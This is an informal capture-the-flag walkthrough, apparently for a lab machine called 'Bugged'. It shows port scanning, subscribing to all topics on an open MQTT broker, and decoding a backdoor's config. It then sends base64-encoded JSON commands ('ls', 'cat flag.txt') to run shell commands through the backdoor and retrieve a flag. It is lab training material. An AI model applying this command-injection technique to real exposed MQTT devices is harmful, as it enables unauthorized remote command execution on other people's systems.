Bugged
Started with a basic nmap scan ……….. no result
Install and used rustscan(download docker “sudo apt install docker.io” “sudo apt install cargo” “cargo install rustscan”
there are many types of install and you may or may not be able to install it properly………..needs to be uninstalled several times. If you can install it within 1 hour Consider Yourself Lucky buy a Lottery Ticket. Otherwise you are in for a very looooooooong ride. Enjoy!!!
Thoroughly use Pentester’s GPT if you want to be quicker
run “rustscan -a 10.10.159.75 — config-path /home/kali/.rustscan.tom”
we got
PORT STATE SERVICE REASON 1883/tcp open mqtt syn-ack
run nmap on port 1883 “nmap -A -p 1883 10.10.159.75”
THEORY ON MQTT
MQTT stands for MQ Telemetry Transport. It is a publish/subscribe, extremely simple, and lightweight messaging protocol, designed for constrained devices and low-bandwidth, high-latency, or unreliable networks. The design principles are to minimize network bandwidth and device resource requirements whilst also attempting to ensure reliability and some degree of assurance of delivery. These principles also turn out to make the protocol ideal for the emerging “machine-to-machine” (M2M) or “Internet of Things” world of connected devices, and for mobile applications where bandwidth and battery power are at a premium.
Default port: 1883
Basic Information About ‘MQTT’
for more:- https://www.hivemq.com/blog/mqtt-essentials-part-5-mqtt-topics-best-practices/
use “sudo nmap <ip> -p 1883 -sC -sV” For further details
PORT STATE SERVICE VERSION 1883/tcp open mosquitto version 2.0.14
install the tool ‘mosquitto’
“sudo apt-get install mosquitto mosquitto-clients -y”
then run “mosquitto_sub -h <ip> -p 1883 -t “#” “
we get :-
eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==
decoded to :-
{“id”:”cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”,”registered_commands”:[“HELP”,”CMD”,”SYS”],”pub_topic”:”U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub”,”sub_topic”:”XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub”}
id — cdd1b1c0–1c40–4b0f-8e22–61b357548b7d
there are publishing code “U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub”
commands like “HELP”,”CMD”,”SYS”
subscribing topic “XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub”
while the command run on one terminal
mosquitto_sub -t "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub" -h 10.10.20.204on other terminal we will emulate the IOT device by
mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "simple_massage" -h 10.10.20.204the message will be visible in the first terminal in base64 as
SW52YWxpZCBtZXNzYWdlIGZvcm1hdC4KRm9ybWF0OiBiYXNlNjQoeyJpZCI6ICI8YmFja2Rvb3IgaWQ+IiwgImNtZCI6ICI8Y29tbWFuZD4iLCAiYXJnIjogIjxhcmd1bWVudD4ifSk=
which is decoded as
<aside> 💡
Invalid message format. Format: base64({“id”: “<backdoor id>”, “cmd”: “<command>”, “arg”: “<argument>”})
</aside>
so we have to enter the scripts in this format and transform it into base64 to make a valid argument let’s cook
{“id”: “<backdoor id>”, “cmd”: “<command>”, “arg”: “<argument>”}
id: cdd1b1c0–1c40–4b0f-8e22–61b357548b7d
cmd: CMD
arg: ls
{“id”: “cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”, “cmd”: “CMD”, “arg”: “ls”}
then to base64 which is
eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAibHMifQ==
now putting it in the mosquitto_pub block
mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAibHMifQ==" -h 10.10.20.204we get back
eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZy50eHRcbiJ9
which is
{“id”:”cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”,”response”:”flag.txt\n”}
we cook again
{“id”: “cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”, “cmd”: “CMD”, “arg”: “cat flag.txt”}
change to base64
eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0NCg==
mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0NCg==" -h 10.10.20.204we get
eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZ3sxOGQ0NGZjMDcwN2FjOGRjOGJlNDViYjgzZGI1NDAxM31cbiJ9
which translated is
{“id”:”cdd1b1c0–1c40–4b0f-8e22–61b357548b7d”,”response”:”flag{18d44fc0707ac8dc8be45bb83db54013}\n”}
Kistimaat !!!!!!!
